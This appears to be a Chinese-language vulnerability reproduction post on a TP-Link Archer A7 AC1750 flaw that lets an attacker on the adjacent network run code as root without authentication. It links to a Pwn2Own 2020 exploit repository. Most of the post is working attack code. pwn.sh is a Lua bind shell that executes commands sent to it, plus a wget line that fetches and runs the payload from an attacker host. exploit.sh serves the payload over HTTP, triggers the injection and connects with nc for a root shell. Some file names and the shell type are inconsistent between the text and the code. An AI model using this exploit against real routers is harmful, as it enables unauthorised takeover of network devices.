漏洞详情  

此漏洞使邻近网络的攻击者可以在TP-Link Archer A7 AC1750路由器的受影响的安装上执行任意代码。利用此漏洞不需要身份验证。

特定缺陷存在于tdpServer端点对MAC地址的处理中。精心制作的TCP消息可以将堆栈指针写入堆栈。攻击者可以利用此漏洞在root用户的上下文中执行代码。
 
 

受影响的产品  

AC1750
 
 

漏洞复现

我们将利用代码分为4个文件:

exploit.sh:HTTP服务器的实例化,两个漏洞利用程序的编排等。
tdpwn.py:众多的关联
tdp.py:利用前面讨论的命令注入;
pwn.sh:要在路由器上执行的命令(例如Lua绑定外壳)


pwn.sh

#!/bin/sh
export LPORT=12345
lua -e 'local k=require("socket");
  local s=assert(k.bind("*",os.getenv("LPORT")));
  local c=s:accept();
  while true do
    local r,x=c:receive();local f=assert(io.popen(r,"r"));
    local b=assert(f:read("*a"));c:send(b);
  end;c:close();f:close();'

wget http://attacker_ip:8000/pwn.sh && chmod +x pwn.sh && ./pwn.sh



将您的IP地址设置为192.168.0.100后,运行 exploit.sh 并等待足够的时间,您应该获得一个反向shell:

exploit.sh

#!/bin/bash

timer () {
      for i in $(seq 80 -10 10)
      do
           echo "$i seconds left..."
           sleep 10
      done
}

attack_func () {
    echo "[+] "
    python3 tdpwn.py
    echo "    And wait for 80 seconds..."
    timer
    echo "[+] Trying to exploit the tddp injection"
    timeout 2 python3 tddp.py
}

clean_web() {
    echo "[-] Stopping Webserver, now"
    kill $PIDWEB
    exit 1
}

echo "[+] Launching web server for distribution of pwn.sh"
python3 -m http.server &
PIDWEB=$?
trap clean_web INT
sleep 2

attack_func
echo ""
echo "[+] Trying the root shell (Low probability of success...)"
sleep 5
echo "nc -v 192.168.0.1 12345"
nc -v 192.168.0.1 12345
echo ""
echo "[ ] If shell hasn't succeed, don't worry, we retry it"
echo ""
attack_func
echo ""
echo "[+] Trying the root shell (High probability of success...)"
sleep 5
echo "nc -v 192.168.0.1 12345"
nc -v 192.168.0.1 12345


下载地址https://github.com/synacktiv/CVE-2021-27246_Pwn2Own2020

参考地址:https://www.synacktiv.com/publications/pwn2own-tokyo-2020-defeating-the-tp-link-ac1750.html#